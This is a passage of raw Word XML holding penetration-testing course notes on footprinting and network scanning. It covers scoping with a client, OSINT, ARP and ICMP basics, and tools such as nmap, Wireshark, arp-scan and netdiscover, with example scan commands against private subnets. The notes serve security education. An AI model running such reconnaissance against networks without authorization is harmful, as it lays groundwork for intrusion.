        <w:t>TCP scans generally yield more results, however doing a UDP scan is always helpful to discover potential UDP ports (such as DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C28350" w14:textId="77777777" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7F4D39" w14:textId="3CB2F85C" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can conduct stealth scans or speedy scans (both have an upside and a downside)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6F964" w14:textId="7A64C5DF" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The more flags/parameters you put on a NMAP scan will cause it to slow down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A453F" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FED8CAA" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C132B57" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B11DD45" w14:textId="40E88535" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NetDiscover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744624FE" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="001160EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE94E23" w14:textId="08FC8F13" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sends ARP requests which resolve MAC addresses to IP addresses and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75626725" w14:textId="5003977F" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“sudo netdiscover -i eth0 -r 192.168.2.0/24”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411EDA3" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A2321A" w14:textId="1C7190EE" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FOOTPRINTING &amp; SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727350E" w14:textId="77777777" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047C255E" w14:textId="36CB3464" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Module 1 Mapping a Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BFC0AC" w14:textId="502448CC" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Module 2 Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18B074" w14:textId="152E360F" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Basic Network concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31296057" w14:textId="59F47870" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Basic Linux familiarity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270A130" w14:textId="77777777" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1314BC23" w14:textId="1F3DD474" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mapping a Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32040A6F" w14:textId="0DDE3957" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Scope – Negotiate with the client; provide them value to mitigate risks and harden networks without burdening the business.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Discovery – Discover hosts and devices, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4249274E" w14:textId="77777777" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBD6C4" w14:textId="353EE6AF" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59A549" w14:textId="5C273FA3" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Physical Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C730A" w14:textId="76227A69" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Physical Security – Testing guards/controls</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ OSINT – Open source, DNS records, websites to find IP addresses or emails before interacting with the host</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F2414" w14:textId="57C0C28D" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741685AC" w14:textId="382AA085" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Passive Reconnaissance – TCPDump, Wireshark; collect IP and MAC addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Watch network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EFBBF4" w14:textId="1C5D89A8" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37E6AA" w14:textId="7CFEE559" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Address Resolution Protocol (RFC 826)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Resolve IP addresses to MAC addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ “Who has 10.10.1.5? Tell 10.10.1.7</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ “10.10.1.5” is at 00:0c:29:af:ea:d2”</w:t>
      </w:r>
      <w:r w:rsidR="00B633A2" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B633A2" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B633A2" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ If you get a reply, ARP is enabled with that server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD2231" w14:textId="4C2E9685" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7221D3" w14:textId="7BBEB245" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>+ Internet Control Message Protocol (RFC 792)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Diagnoses network connectivity issues, for example if packets are dropped.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Traceroute – All the points from the destination to the source (packets)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Ping – Asks for a reply; Type 8 – echo request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A5D55" w14:textId="77777777" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5C8721" w14:textId="56BB21AD" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB3E88A" w14:textId="08AC060A" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ WIRESHARK</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ ARP-SCAN</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ PING</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ FPING</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ NMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ ZENMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1B591" w14:textId="77777777" w:rsidR="00F231DC" w:rsidRPr="002A77BD" w:rsidRDefault="00F231DC" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E8C370" w14:textId="0286A649" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00F231DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4CE2B" w14:textId="38403C12" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Try to find ARP response requests that map a MAC address to an IP address, or vice versa respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB2DAF" w14:textId="27537D6E" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pretty self-explanatory but can be confusing the more packet clutter there is in a packet capture file or instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4AE4F" w14:textId="470AC961" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB690AE" w14:textId="0D605C4C" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ARP-Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522A2DFF" w14:textId="193391C8" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“sudo arp-scan -I tap0 -g 10.142.111.0/24”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1C470" w14:textId="056264DD" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
